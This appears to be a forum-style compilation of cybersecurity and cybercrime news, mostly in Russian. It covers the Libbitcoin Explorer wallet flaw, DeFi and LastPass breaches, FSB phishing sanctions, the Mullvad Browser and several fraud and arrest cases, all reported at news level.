Наиболее распространенными угрозами аналитики называют бэкдор Beacon, который включен в состав Cobalt Strike, фреймворк для постэкспуатации Empire, вымогателей Maze и Netwalker, а также пентестерское решение Metasploit. То есть три из пяти угроз на деле представляют собой не малварь, а вполне законные ИБ-инструменты (Beacon, Empire и Metasploit), которые просто любят использовать злоумышленники

Источник: xakep.ru/2021/04/14/1900-hacking-groups/
Эксперты компании Distrust обнаружили критическую уязвимость в консольной утилите Libbitcoin Explorer для криптовалютных кошельков, которая позволяет злоумышленникам получать доступ к сид-фразам и похищать средства. По состоянию на август ущерб от ее эксплуатации оценивается более чем в $900 000.
Libbitcoin Explorer устраняет необходимость доступа к полной ноде блокчейна биткоина для проведения различных операций, включая генерацию закрытых ключей и управление транзакциями.

Биткоин-адрес, помеченный платформой MistTrack как высокорисковый. Данные:
X.
Найденный баг затрагивает с 3.0.0 по 3.6.0 версии утилиты и связан с
генератором псевдослучайных чисел (PRNG).
Как пояснили исследователи Антон Ливаджа и Райан Хейвуд, для генерации случайных чисел при создании биткоин-кошелька Libbitcoin Explorer использует команду «bx seed». Однако если инструмент опирается на слабый алгоритм, безопасность энтропии сокращается с 256 до 32 бит. Это позволяет злоумышленникам потенциально взломать закрытые ключи пользователей в течение нескольких дней.
«Если вы создали кошелек с помощью Bitcoin Explorer от Libbitcoin, ваши средства находятся под угрозой (или уже украдены)», — отметил технический эксперт Дэвид Хардинг.
Click to expand...
Согласно выводам исследователей, основная кража произошла примерно 12 июля 2023 года, но первоначальные взломы, вероятно, начались в мае. По состоянию на август украдены свыше $900 000 в биткоине, Ethereum, XRP, Dogecoin, Solana, Litecoin, Bitcoin Cash и Zcash. Ответственного за кражи со взломанных кошельков установить пока не удалось.
Список потенциально подверженных уязвимости биткоин-кошельков не публиковался, хотя и упоминается, что их общее число может превышать 2600 единиц. По словам экспертов, MetaMask, Ledger и Trezor не были затронуты.
Команда Libbitcoin оспорила выводы исследователей, ссылаясь на то, что пользователи не должны были прибегать к команде «bx seed», поскольку во многих документах она помечается как неподходящая для безопасного создания кошелька.
Пользователям уязвимых версий Libbitcoin Explorer настоятельно рекомендовали перевести средства на безопасные адреса, используя проверенный метод генерации случайных чисел для создания кошельков.
source:
milksad.info/index.html
twitter.com/hrdng/status/1689022029142560771
twitter.com/tayvano_/status/1689599497616388096
milksad.info/disclosure.html#libbitcoin-vendor-response
Полиция Китая провела масштабную спецоперацию в городском округе Сюйчжоу по борьбе с организованной преступностью, в ходе которой был задержан 31 человек, связанный с компанией Star Alliance. Она занимает 38-е место по размеру пула в рядах майнеров Filecoin, что стало поводом для сообщений про атаку властей КНР на эту криптовалюту.
По данным Синьхуа, целью рейда стала созданная под вывеской Star Alliance финансовая пирамида, построенная на мнимой аренде дискового пространства для добычи FIL.
Преступники не занимались майнингом, выплачивая ранним инвесторам проценты из средств от новых клиентов. При обыске в офисах была обнаружена и изъята криптовалюта ETH, FIL и местный токен TEDA на $80 млн. Арестованные подтвердили отсутствие реальной цели майнинга Filecoin, а также злоупотребление связями с Star Alliance.
Компания выступила с официальным заявлением о непричастности к схеме и возврате части ее сотрудников, арестованных полицией. Сейчас в Китае находится до 90% добывающих мощностей Filecoin, то привело к падению курса монеты после полицейского рейда.
Аналитики компании PeckShield, специализирующейся на безопасности криптовалютных проектов, сообщили о взломе сервиса для децентрализованных финансов Jimbo’s Protocol. Хакеры вывел 4 090 ETH ($7,5 млн).
Взлом связан с отсутствием контроля над проскальзыванием цены токенов под управлением протокола, говорят специалисты PeckShield. Уязвимость была обнаружена во второй версии протокола, которую запустили три дня назад. Для проведения атаки хакер воспользовался мгновенным кредитом в размере $5,9 млн.
«Мы уже знаем о взломе нашего протокола, активно сотрудничая с правоохранительными органами и специалистами по информационной безопасности. Мы опубликуем более подробные сведения при первой возможности», ― пообещали разработчики Jimbo’s Protocol.
Проект Jimbo’s работает на базе решения Arbitrum. Разработчики пытались создать токен с «полустабильной» минимальной ценой, поддерживаемой определенным объемом сторонних активов. Для этого они взяли элементы проекта Olympus DAO, который показывал себя хорошо, но затем токен рухнул. Разработчики Jimbo’s изменили некоторые аспекты проекта, чтобы сделать токен более стабильным. Для этого, в том числе, используется собственная ликвидность проекта.
Jimbo’s Protocol начал работу 16 мая, однако вскоре был остановлен из-за ошибки в смарт-контрактах. Разработчики призвали сообщество не использовать проект и дождаться появления второй версии протокола. Но они слишком поторопились развернуть смарт-контракты и не провели достаточного количества проверок. После взлома курс токена рухнул с $0,24 до 0.
Со вчерашнего дня (10 марта 2021 года), по решению Роскомнадзора работа Twitter на территории России замедлена на 100% с мобильных устройств и на 50% со стационарных устройств. Это связано с тем, что, по утверждениям Роскомнадзора, «Twitter в период с 2017 года по настоящее время не удаляется контент, склоняющий несовершеннолетних к совершению самоубийств, содержащий детскую порнографию, а также информацию об использовании наркотических средств».
Продолжаем следить за ситуацией и ее изменениями по состоянию на 11 марта 2021 года.
Как вчера сообщали эксперты, замедление коснулось всех доменов, в составе которых содержится «t.com», и в итоге пострадали тысячи ресурсов, включая GitHub, Microsoft, Steam, Reddit и так далее. Сегодня те же специалисты и пользователи заметили, что ошибку исправили, и теперь замедление распространяется только на Twitter и его ресурсы.
Когда в США начался рабочий день, представители социальной сети прокомментировали происходящее. Представители Twitter распространили в СМИ следующее заявление:
«Нам известно о том, что Twitter в России подвергся намеренному замедлению (масштабному и беспорядочному) из-за беспокойства по поводу удаления контента. Давайте проясним: мы придерживаемся политики абсолютной нетерпимости в отношении сексуальной эксплуатации детей, а поощрение, восхваление и подталкивание к самоубийству и членовредительству прямо противоречит правилам Twitter, и мы запрещаем использовать Twitter для любых противоправных действий и незаконной деятельности, в том числе для покупки и продажи наркотиков. Мы по-прежнему является приверженцами открытого интернета для всего мира и глубоко обеспокоены участившимися попытками заблокировать и ограничить публичные обсуждения в интернете».
Click to expand...
Между тем на сайте Роскомнадзора появилось новое сообщение, согласно которому «Твиттер замедлен штатно», а «ответ на направленное Роскомнадзором в Twitter требование об удалении запрещенных материалов с детской порнографией, пронаркотическим и суицидальным контентом не поступал». В ведомстве надеются, что компания все же предпримет "все необходимые меры по удалению упомянутой запрещенной информации", а затем проинформирует об этом Роскомнадзор.
Пользователи и СМИ, в свою очередь, продолжают следить за тем, у каких провайдеров Twitter замедлен, а у каких продолжает работать как обычно. Проверить замедление на своих устройствах можно, например, на специально созданных для этого сайтах: 1 и 2.
Источник: xakep.ru/2021/03/11/twitter-updates/
LastPass reports that a second attack on its system has happened.
As a reminder, in December of the last year, LastPass had a severe data breach which apparently gave access to encrypted vaults of their users as well as customers' information.
Now, the company has stated that one of its DevOps engineers had their personal home computer breached and infected with a keylogger and that provided access to a shared cloud storage environment (AWS S3 bucket) that housed backups of LastPass customer and encrypted vault data.
Overall, LastPass customers may have been affected in varying degrees, as there was a lot of stolen data, ranging from multifactor authentication (MFA) seed to customer metadata and backups.
Here you can find what information has been stolen so far (as reported by the company) https://support.lastpass.com/help/what-data-was-accessed
Have a nice day.
Sources:
<https://web.archive.org/web/2/https://thehackernews.com/2023/02/lastpass-
reveals-second-attack.html>
https://xakep.ru/2023/02/28/lastpass-breach/
https://support.lastpass.com/help/what-data-was-accessed
Воспользовавшись ажиотажем вокруг презентации новинок от Apple мошенники
запустили фейковую трансляцию — во время эфира они объявили о раздаче
криптовалют среди зрителей.
Перед проведением презентации американской компанией Apple киберпреступники
начали вести свой онлайн-стрим в основных видеохостинговых порталах. Алгоритмы
разных площадок сработали так, что вывели эту трансляцию в ТОП поисковой
выдачи, несмотря на то, что она являлась фейковой. В результате тысячи
пользователей перешли по ссылке, чтобы начать просмотр трансляции.
Злоумышленники вставили в свой стрим ролик с генеральным директором Apple
Тимом Куком, а рядом разместили текстовое объявление о криптовалютном
конкурсе, согласно которому компания якобы купила 100 тыс. биткоинов, а затем
решила раздать 1 тыс. BTC и 10 тыс. Ethereum зрителям. По условиям, участникам
нужно было перейти на сайт и отправить от 0,1 BTC на указанный там кошелек,
чтобы потом получить в 2 раза больше криптовалюты. Им обещали максимальный
выигрыш в 40 BTC или 1 тыс. ETH.
Более 165 тысяч пользователей одновременно смотрели стрим, но позже на канал
начали поступать жалобы и его заблокировали. Канал и указанный в трансляции
сайт сейчас недоступны.
"Сегодня Управление по контролю за иностранными активами Министерства финансов США (OFAC) в координации с Соединенным Королевством внесло в список двух лиц, связанных с группой современной постоянной угрозы (APT), которую спонсирует Федеральная служба безопасности России", - говорится в сообщении.
Она нацелена на физических и юридических лиц в США, Великобритании и других странах-союзниках и партнерах.
Заместитель министра финансов по вопросам терроризма и финансовой разведки Брайан Нельсон заявил, что Соединенные Штаты и Соединенное Королевство выступают вместе и стойко противостоят усилиям Кремля и его спонсируемых государством злонамеренных кибергрупп, нацеленных на их демократии.
ФСБ использует фишинг против США и Великобритании
Отмечается, что Кремль использует ФСБ для продвижения интересов Кремля и попыток подорвать интересы Соединенных Штатов, их союзников и партнеров. ФСБ использует свои кибервозможности для совершенствования своих кампаний по шпионажу, влиянию и вторжению.
Подразделение ФСБ отвечает за APT, нацеленную на США и другие страны. Подразделение ФСБ, отличающееся узкоспециализированным целевым фишингом, получило несколько прозвищ от частных фирм, занимающихся кибербезопасностью, среди которых "Каллисто" или "Группа Каллисто", "Сиборгиум", "Колдрайвер", "Звездная метель", "Паутинный медведь", "Команда ReUse", "Танцующая Соломия", "BlueCharlie" и другие.
Целевые фишинговые кампании ФСБ были разработаны для получения доступа к учетным записям электронной почты, поддержания постоянного доступа к учетным записям и связанным с ними сетям, а также для получения и потенциальной утечки конфиденциальной информации для достижения политических целей Кремля.
Кто попал под санкции
Минфин США сообщает, что к этой целевой фишинговой деятельности причастны два человека, а именно офицер ФСБ Руслан Александрович Перетятько и ИТ-работник из Сыктывкара Андрей Станиславович Коринец.
В период с 2016 по 2020 год Коринец обманным путем создал и зарегистрировал инфраструктуру вредоносных доменов для целевых фишинговых кампаний ФСБ. Он анонимно создавал сокращенные URL-ссылки, которые встраивались в фишинговые электронные письма.
Корешок создал по меньшей мере 39 доменов через 5 различных регистраторов доменов, используя псевдонимы и поддельные адреса в попытке скрыть себя от доменов. С момента активации и до конца 2019 года поддельная учетная запись электронной почты, призванная имитировать отставного генерала ВВС США, отправила не менее 20 целевых фишинговых писем, включая домены, созданные Коринцем.
Перетятко использовал несколько адресов электронной почты, которые были созданы для имитации законных управленческих учетных записей известных технологических компаний, для рассылки целевых фишинговых писем, некоторые из которых содержали инфраструктуру домена, созданную Коринцем.
• Ruslan Aleksandrovich PERETYATKO, who is a Russian FSB intelligence officer and a member of Star Blizzard AKA the Callisto Group
• Andrey Stanislavovich KORINETS, AKA Alexey DOGUZHIEV, who is a member of Star Blizzard AKA the Callisto Group
Кибератаки РФ
Сегодня правительство Великобритании обвинило Федеральную службу безопасности России в попытках вмешательства в политические процессы с помощью кибератак. В британский МИД уже вызвали российского посла Андрея Келина.
• Source: https://home.treasury.gov/news/press-releases/jy1962
• Source: https://www.justice[.]gov/opa/pr/two-russian-nationals-working- russias-federal-security-service-charged-global-computer
• Source: <https://www.gov.uk/government/speeches/deputy-prime-minister- speech-on-cyber-operations>
• Source: [https://www.gov.uk/government/news/...rference-in-politics-and- democratic-processes](https://www.gov.uk/government/news/uk-exposes-attempted- russian-cyber-interference-in-politics-and-democratic-processes)
О британских обвинениях в сфере информационно-коммуникационных технологий.
7 декабря с.г. советник-посланник Посольства действительно был приглашен на встречу в Форин Офис. В который раз в адрес России прозвучали придуманные обвинения в кибератаках, в т.ч. якобы связанные с избирательными процессами в Великобритании. По завершении встречи было также объявлено о введении против двух российских граждан, будто бы связанных с этими инцидентами, нелегитимных односторонних ограничений.
В ответ с нашей стороны было заявлено, что в отсутствие конкретных доказательств у нас нет ни малейших оснований доверять этим инсинуациям. Напомнили, что до начала специальной военной операции на Украине Россия неоднократно предлагала Лондону наладить профессиональный диалог по вызывающим обеспокоенность происшествиям в сфере информационно-коммуникационных технологий (ИКТ). Однако британская сторона всякий раз отказывалась от наших предложений.
При этом, как и раньше, обращаем внимание, что в России для этих целей действует Национальный координационный центр по компьютерным инцидентам, в рамках которого функционирует «горячая линия». Ее телефон: +79169010742; электронный адрес: incident@cert.gov.ru. Нет ничего проще, чем обратиться по этим адресам в случаях выявления подозрительной компьютерной активности. Аналогичные механизмы, причем одновременно с российским и британским участием, существуют и в ОБСЕ. И об этом прекрасно известно в Форин Офисе. Речь идет о Сети связи, используемой Центром по предотвращению конфликтов Секретариата ОБСЕ.
Однако вместо этих элементарных действий британский МИД громко озвучивает голословные обвинения по извлеченным из нафталина мифам, бытовавшим по большей части в период 2018-2019 гг. Понятно, что выдвинуты они с сугубо политическими, конъюнктурными целями – в попытке обеспечить правительству консерваторов поддержку накануне выборов, а также продемонстрировать зарубежным партнерам мнимое британское «лидерство» на антироссийском фронте. Вероятно, все это также призвано создать дополнительную рекламу дорогостоящему британскому Национальному центру кибербезопасности, хотя в его способности произвести атрибуцию подобных кибернападений у нас остаются весомые сомнения.
Обращаем внимание, что ранее предъявленное нами британской стороне настоятельное требование прекратить агрессивную линию, направленную на милитаризацию ИКТ-пространства, остается без какой-либо реакции официального Лондона.
• Source: [https://london.mid.ru/ru/press- cent...formatsionno_kommunikatsionnykh_tekhnologiy_/](https://london.mid.ru/ru/press- centre/o_britanskikh_obvineniyakh_v_sfere_informatsionno_kommunikatsionnykh_tekhnologiy_/)
A bipartisan group of [U.S. senators](https://www.wyden.senate.gov/news/press- releases/wyden-bipartisan-senators-question-online-ad-exchanges-on-sharing-of- americans-data-with-foreign-companies) has sent a letter to Google, Twitter, Verizon, AT&T and online advertising firms and networks raising national security concerns about the selling of citizens' personal data, which could end up in the hands of foreign governments.
See Also: Live Webinar | Attacks on Cloud Infrastructure
In the letter, the lawmakers question these firms about the practice of "real-time bidding" - part of the digital advertising process used to place targeted, personalized ads across websites and other online services.
While only one company can win the bidding process when it comes to placing ads on websites, other firms that participate in the process can also gain access to the personal information of consumers targeted by these ads. This can sometimes include data such as device identifiers and cookies, web browsing and location data, and IP addresses, as well as age and gender information. While the data is usually anonymized, it's possible to match a specific user to the information.
These personal details, referred to as bidstream data, can then be packaged by data brokers and sold to companies - and sometimes governments - with little or no oversight, the senators write in their letter.
"Few Americans realize that some auction participants are siphoning off and storing 'bidstream' data to compile exhaustive dossiers about them. In turn, these dossiers are being openly sold to anyone with a credit card, including to hedge funds, political campaigns and even to governments," Sen. Ron Wyden, D-Ore., who led the senators in raising the issues to these firms, says in the letter.
Wyden and the other senators note that this information could end up in the hands of foreign governments and be used to create digital profiles of American citizens.
"This information would be a goldmine for foreign intelligence services that could exploit it to inform and supercharge hacking, blackmail and influence campaigns," the letter notes.
The letter demands that the companies provide names of every "foreign- headquartered or foreign-majority owned company to whom your firm has provided bidstream data from users in the United States and their devices in the past three years."
Some U.S. agencies have taken advantage of the bidstream data process, according to earlier news reports.
For example, [Motherboard](https://www.vice.com/en/article/n7vwex/cbp-dhs- venntel-location-data-no-warrant) reported in October 2020 that U.S. Customs and Border Protection bought location data from a private company, which raised questions about whether the agency was conducting warrantless surveillance of American citizens.
Scott Shackelford, chair of Indiana University's cybersecurity program, notes that the real-time digital bidding process and bidstream data have been problematic for years. This points to the need for comprehensive, nationwide legislation to protect U.S. citizens' data and privacy, he says (see: [Federal Privacy Bill Reintroduced in Congress](https://www.databreachtoday.com/federal-privacy-bill-reintroduced- in-congress-a-16178?)).
"In the aftermath of data breaches, including at Equifax and Anthem, it’s true that much of this data may already be available. … But we should not be making it this easy for anyone, or any organization, with a credit card number to purchase personal information at this scale," Shackelford says.
Others have also pointed to the large amount of personal data that online and digital advertisers and their networks can collect about consumers with little or no consent.
Chris Pierson, CEO and founder of the security firm BlackCloak, notes that even with some security measures put in place, it's nearly impossible to block the collection of personal data from digital ad networks.
"While the marketplace is crowded with numerous apps that block tracking, VPNs that are used intermittently, or devices that also strip ads and tracking from users, they all suffer from a 'whack-a-mole 'approach," Pierson says.
Commenting on the senators' letter, an AT&T spokesperson tells Information Security Media Group: "We received the letter and will respond as requested, but we have thorough processes in place to protect the data referenced in the letter."
A spokesperson for Google notes: "Privacy and transparency are core to how our ads services work. We never sell people's personal information and all ad buyers using our systems are subject to stringent policies and standards, including restrictions on the use and retention of information they receive."
ISMG could not immediately reach representatives for the other firms who received the letter for comment on Tuesday.
Besides Wyden, the letter is signed by Democrats Kirsten Gillibrand of New York, Mark Warner of Virginia, Sherrod Brown of Ohio and Elizabeth Warren of Massachusetts and Republican Bill Cassidy of Louisiana.
Эксперты Group-IB сообщают, что кардерский ресурс Swarmshop был взломан, и с него утекла информация обо всех продавцах, покупателях, а также все данные ворованных карт, которыми торговали на сайте.
[](https://xakep.ru/wp- content/uploads/2021/04/345484/f19598e91612fdbc0518dccbad998378.png)
По данным компании, компрометация сайта произошла в марте 2021 года, хотя сначала администраторы Swarmshop утверждали, что данные были получены в результате предыдущего взлома, датированного январем 2020 года. Тогда хакер попытался продать базу данных пользователей форума, и всех участников попросили сменить пароли.
Однако эксперты Group-IB проанализировали свежий дамп и пришли к выводу, что он новый, судя по временным отметкам активности пользователей. Дамп содержит 12 344 записи участников форума, включая никнеймы, хешированные пароли, контактные данные, а также историю активности администраторов, продавцов и покупателей Swarmshop.
В общей сложности БД содержит 4 записи об администраторах ресурса, 90 записей о продавцах и 12 250 записей о покупателях ворованных данных.
Хуже того, в распоряжении похитителей оказалась вся информация о ворованных банковских картами, которыми торговали на сайте. В дампе были найдены данные о 623 036 платежных картах, выпущенных банками США, Канады, Великобритании, Китая, Сингапура, Франции, Бразилии, Саудовской Аравии и Мексики. А также 498 наборов учетных данных от онлайн-банкинга и 69 592 набора номеров социального страхования для жителей США и Канады.
[](https://xakep.ru/wp- content/uploads/2021/04/345484/8a382d51ad431c2f7a8d864e8cb58730.jpg)
Технический директор Group-IB Дмитрий Волков говорит, что взломы кардерских магазинов — явление редкое. В компании считают, что Swarmshop стал жертвой чьей-то мести, а в результате все продавцы лишились своих товаров и личных данных.
Источник: xakep.ru/2021/04/09/swarmshop/
Проект Tor и VPN-провайдер Mullvad представили совместно развиваемый web-браузер Mullvad Browser, ориентированный на защиту конфиденциальности пользователя. Технически Mullvad Browser основан на движке Firefox и включает почти все изменения из Tor Browser, отличаясь главным образом тем, что не использует сеть Tor и отправляет запросы напрямую (вариант Tor Browser без Tor). Предполагается, что Mullvad Browser может быть интересен пользователям которые не хотят работать через сеть Tor, но желают получить доступные в Tor Browser механизмы повышения конфиденциальности, блокирования отслеживания посещений и защиты от идентификации пользователя. Mullvad Browser не привязан к Mullvad VPN и может использоваться всеми желающими. Код браузера [распространяется](https://gitlab.torproject.org/tpo/applications/mullvad- browser/) под лицензией MPL 2.0, разработка ведётся в репозитории проекта Tor.
Для обеспечения дополнительной защиты в Mullvad Browser, как и в Tor Browser, включена настройка "HTTPS Only" для шифрование трафика на всех сайтах, где это возможно. Для снижения угрозы от проведения атак с использованием JavaScript и блокирования рекламы в комплекте поставляются дополнения NoScript и Ublock Origin. Для определения имён задействован DNS-over-HTTP сервер Mullvad. Готовые сборки формируются для Linux, Windows и macOS.
По умолчанию применяется режим приватного просмотра, удаляющий Cookie и историю посещений после окончания сеанса. Доступно три режима безопасности: Standard, Safer (JavaScript включён только для HTTPS, отключена поддержка тегов audio и video) и Safest (без JavaScript). В качестве поисковой системы применяется DuckDuckgo. В состав входит дополнение Mullvad для вывода информации об IP-адресе и подключении к Mullvad VPN (использование Mullvad VPN не обязательно).
Для защиты от отслеживания перемещения пользователя и от выделения специфичных для конкретного посетителя особенностей отключены или ограничены API WebGL, WebGL2, Social, SpeechSynthesis, Touch, WebSpeech, Gamepad, Sensors, Performance, AudioContext, HTMLMediaElement, Mediastream, Canvas, SharedWorker, Permissions, MediaDevices.enumerateDevices и screen.orientation, а также отключены средства отправки телеметрии, Pocket, Reader View, HTTP Alternative-Services, MozTCPSocket, "link rel=preconnect", организована отдача данных только о части установленных шрифтов. Для блокирования идентификации по размеру окна задействован механизм letterboxing, добавляющий отступы вокруг содержимого веб-страниц. Убран менеджер паролей.
Отличия от Tor Browser: не используется сеть Tor, отсутствует поддержка разных языков, возвращена поддержка WebRTC и API Web Audio, интегрированы дополнения uBlock Origin и Mullvad Browser Extension, отключена защита Drag&Drop, прекращён вывод предупреждения при загрузках, в NoScript отключена защита от утечек между вкладками информации, которую можно использовать для идентификации пользователя.
В общем ситуация следующая, со слов Дениса Давыдова @cpamix его действительно накрыла Кибер Полиция
Денис удалился абсолютно со всех сделок и групп.
С его слов он сказал что все депозиты выплатит как решит свои проблемы, ждем его появления и комментариев.Click to expand...
25 августа в нескольких арбитражных чатах написали о том, что Денис Давыдов (@cpamix) удалился из всех своих сообществ, почистил сообщения и пропал с депозитами по сделкам. Некоторые начали писать обвинения в скаме.

Позже появилась информация о том, что у @cpamix проблемы с киберполицией. Известно, что его задержали, но он смог выйти на связь с Виктором и прояснить ситуацию. В этом пункте конечно много вопросов, кто ему дал это сделать и т.д.

По словам Виктора, Денис (@cpamix) на короткое время зашел в Telegram, почистил все диалоги и даже добавил в “О себе” информацию о том, что его накрыл «Отдел K». Пользователи в чате начали писать, что это подозрительно. Особенно с учетом того, что это не украинская силовая структура.

Общение с пострадавшими клиентами @cpamix, у которых были открыты сделки на момент инцидента, взял на себя Виктор. Он попросил переслать информацию и удалиться из чатов с Денисом. Клиенты плохо это восприняли и хотят получить деньги обратно.

В ответ Виктор скинул скриншот свежего звонка с Денисом и повторил ранее сказанную информацию, о том, что нужно переслать данные по сделкам и удалиться из чатов.

В одном из аффилированных с Денисом (@cpamix) чатов отписался анонимный пользователь, который сообщил что аккаунт Telegram гаранта у него под контролем, пока владелец решает проблемы.

За 2 недели до инцидента в одном из своих чатов Денис выложил скрины с угрозами. В переписке Noize настаивает на личной встрече и показывает, что настроен серьезно. Возможно, именно он создал проблемы с киберполицией.

Киберполиция Украины — подразделение, которое занимается преступлениями в интернете. Они расследуют в том числе и дела, связанные с мошенничеством посредством платежных систем. На официальном сайте ведомства есть форма для обращения, через которую хейтер мог отправить жалобу на Дениса.
Один из пользователей чата написал, что @cpamix работал посредником в сделках с черным рынком и не скрывал свои персональные данные. Это сильно облегчило работу сотрудникам киберполиции.

В начале 2021 года Денис давал интервью арбитражному медиа и в нем сказал, что начал работать гарантом в 2021 и за год провел более 3 100 сделок. Он публиковал в открытом доступе свои настоящие фото, город проживания и номер телефона.
При этом Денис скрыл информацию о себе в «Глазе Бога», но по фотографиям любой пользователь мог найти данные о друзьях, дополнительные номера телефона, ФИО и даже адрес регистрации.

Еще он активно чистил теги в приложении для распознавания номеров телефонов Getcontact и оставлял только тематические: гарант, арбитраж, cpamix.

Известно, что до карьеры гаранта Денис был админом сеток арбитражных каналов и базы скамеров. В 2020-2021 годах перестал лить трафик и начал активно развивать гарант-сервис.
Судя по данным из открытых источников, месячные обороты у него были существенные — в отчетах по сделкам фигурируют суммы в $30-50k. Этих объемов более чем достаточно для возникновения интереса со стороны правоохранительных органов.

Денис брал за услуги гаранта 10$ для сделок до 50$ и 15% от суммы для сделок от 50$. В условиях предоставления услуг было указано, что заказчик должен оплатить 10% от суммы сделки, даже если она не состоялась.
Примечательно, что 25 числа с криптовалютного кошелька гаранта был выведен весь остаток — 40 500 USDT. Потом средства провели через несколько кошельков и, по всей видимости, вывели на децентрализованную биржу.

После анализа всех известных на данный момент фактов можно выделить несколько возможных причин возникновения проблем:
До появления объяснений от самого Дениса мы не можем сделать однозначный вывод, но пока кейс выглядит подозрительно. Особенно с учетом опустошения криптовалютного кошелька в день инцидента.
Click to expand...
В нише гарант-сервисов у @cpamix хорошая репутация и нет жалоб на скам с пруфами. Единственный негатив по отношению к нему — участие в сомнительной дропшиппинговой платформе, где Денис якобы заработал 1 млн гривен за 2-3 часа работы в день.

По словам Виктора, Денис должен выйти на связь и вернуть депозиты по незавершенным сделкам. Когда появится новая информация, мы обновим статью. Пока что остается только строить догадки о причинах инцидента.
UPD. Появилась свежая инфа, что Дениса взяли по статье 361-2 ККУ «Несанкционированный сбыт или распространение информации с ограниченным доступом». По ней предусмотрен штраф $6,2-12,4k или лишение свободы на срок до двух лет.

Судебная практика по этой статье не сформирована, прецедентов практически нет. Что подразумевается под «информацией с ограниченным доступ» в кейсе Дениса сложно предположить. Будем ждать комментариев.
Работники ГБР завершили досудебное расследование в отношении киберпреступника из Винницы, который обманывал иностранцев и легализовывал доходы от нелегальных операций. Обвинительный акт направлен в суд.
Свою деятельность злоумышленник начал в 2017 году, он создавал и сбывал вредоносное программное обеспечение для одной из операционных систем, что позволяло похищать персональные данные с мобильных устройств.
Впоследствии он начал заниматься «фишингом», с помощью фиктивных ссылок и специальных сайтов похищать банковские данные жителей Канады и США. Похищенные данные он продавал за криптовалюту. По результатам расследования установлено, что ему удалось похитить и легализовать на территории Украины около 3,5 млн грн.
После расследования дела другими правоохранительными органами по решению процессуального руководителя ее передали в ГБР.
В феврале 2024 года киберпреступнику сообщили о подозрении. Сейчас арестован элитный автомобиль мужчины для дальнейшей специальной конфискации.
Фигурант обвиняется в создании и распространении вредоносных программных средств, несанкционированном вмешательстве в работу электронно-вычислительных машин, легализации имущества (ч. 1 ст. 361-1, ч. 2 ст. 361, ч. 1 ст. 209 УК Украины).
Санкция статьи предусматривает наказание в виде лишения свободы на срок до 6 лет с конфискацией имущества.
Процессуальное руководство осуществляет Винницкая областная прокуратура.
• Source: https://dbr[.]gov.ua/news/za-materialami-dbr-suditimut- kiberzlochincya-z-vinnici-za-vikradennya-danih-z-bankivskih-kartok-inozemciv
В декабре женщина по имени Аманда (имя изменено) ответила на сообщение в
Facebook Эймона Ахмеда, гражданина Ирландии, живущего в США, который был
незаконно лишен паспорта в Турции и должен был покинуть страну, сообщает
передача Bez Tabu (TV3).
Женщина рассказала передаче, что она регулярно переписывалась с мужчиной, а
также созванивалась. Она это делала, чтобы попрактиковаться в своих знаниях
английского языка. В ходе переписки стороны обменялись различной информацией,
в том числе фотографиями. Переписка также велась в WhatsApp.
Эймон Ахмед начал шантажировать женщину и дал понять, что он публично унизит ее. Он намеревался сделать это, опубликовав профессионально обработанные фотографии, присланные Амандой.
Аманда получила угрозы для своей жизни и жизни своих детей.
Он заявил, что взорвет ее машину, когда она сядет в нее с двумя детьми.
"Из-за шантажа и угроз с марта до по конца мая я заплатила около 6000 евро. Шантаж и угрозы разные, присылаются беседы и фото. Если я не заплачу деньги, то он обещает переслать все моим друзьям, коллегам. Когда я его заблокировала, он начал писать на электронную почту, в том числе и на рабочую. В письме написано, что он взорвет машину, если я не переведу 500 евро", - вспоминает пострадавшая.
Чтобы с этим справиться, Аманда приобрела подарочные карты на всемирно известной игровой платформе Steam. Позже она заблокировала этого человека, но он разыскал ее старшую дочь, а также ее коллег и друзей.
"Я звонила в полицию, там надо мной посмеялись и сказали, что все равно ничего нельзя сделать. Я все равно написала заявление. Если бы полиция подключилась немедленно, можно было бы получить обширную информацию об этих мошенниках, но правоохранительные органы этого не делают. В Латвии такие жертвы вообще не защищены - нигде не публикуются номера таких мошенников, не описывается, как действовать более корректно. Невозможно получить никакую помощь", - говорит пострадавшая.
Аманда обратилась в программу Bez Tabu, чтобы указать, что жители Латвии, оказавшиеся в такой ситуации, уязвимы и они не могут получить помощь.
Женщина написала заявление в полицию три недели назад, но до сих пор не получила звонка от сотрудников правоохранительных органов.
В Госполиции подчеркивают, что "женщине по почте отправили запрос о необходимости дополнительной информации".
Начальник отдела превенции Андис Ринкевицс отмечает, что ежегодно десятки латвийцев оказываются в подобных ситуациях и у них вымогают несколько тысяч евро.
Как только мошенники чувствуют возможность получить деньги, они приложат все усилия, чтобы продолжить начатое.
"Было бы бесполезно составлять список информации о том, как мошенники идентифицируют себя. Они регулярно меняют номера и профили. Мошенник хорошо знаком с человеком, знает все слабые места и очень хорошо подготовлен к их использованию. В большинстве случаев, когда они понимают, что больше не смогут вымогать деньги, они оставляют вас в покое. Если они мошенники из страны третьего мира, то вероятность того, что они могут физически повлиять на вас или вашего родственника, минимальна", - сказал Андис Ринкевицс.
Эти действия, скорее всего, будут осуществляться преступной группой в третьей стране, например в Индии. Госполиция не может наказать этих людей.
Если вы начали переписку с незнакомцем, вы можете легко проверить происхождение фотографий этого человека. Это можно сделать, щелкнув изображение правой кнопкой мыши и выбрав опцию поиска изображения в Google.
При изучении присланных Аманде снимков выяснилось, что в мошеннических целях использовались фотографии известного бразильского врача и ведущего Фернандо Гомеса Пинто (см. выше). В его профиле в Facebook можно найти много разных фотографий хорошего качества, которые также популярны у мошенников.
Чем больше людей сообщат о поддельных и мошеннических профилях, тем скорее это привлечет внимание администрации сайта.
Молодой человек был признан виновным в обучении террористической деятельности
и изготовлении взрывчатых веществ.
Верховный суд РФ утвердил приговор в виде пяти лет колонии для 16-летнего
гражданина Никиты Уварова.
Юноша был обвинен в обучении террористической деятельности и изготовление взрывчатых веществ. Молодой человек вместе с товарищами за планировал устроить "взрыв" здания ФСБ в компьютерной игре Minecraft. Об этом пишет "Коммерсантъ". Издание отмечает, что уголовная ответственность по указанной статье наступает с 14 лет.
Никита Уваров заявил на заседании Верховного суда, что он "не опасен для общества" и что пять лет тюремного заключения слишком жестоко. Молодой человек также утверждал, что раскаялся и не намерен больше нарушать закон.
Напомним, что 10 февраля 2022 года первый Восточный окружной военный суд вынес приговор в деле трех канских подростков, которые были обвинены в прохождении обучения для террористической деятельности и изготовлении взрывчатых веществ.
Лидер группы, 16-летний Никита Уваров, был приговорен к 5 годам колонии и штрафу в 30 000 рублей. Он был арестован в зале суда. Два его товарища были освобождены от уголовной ответственности, поскольку они помогли следствию. За изготовление взрывчатых веществ они получили условные сроки (3 и 4 года).
source: kommersant.ru/doc/5773616
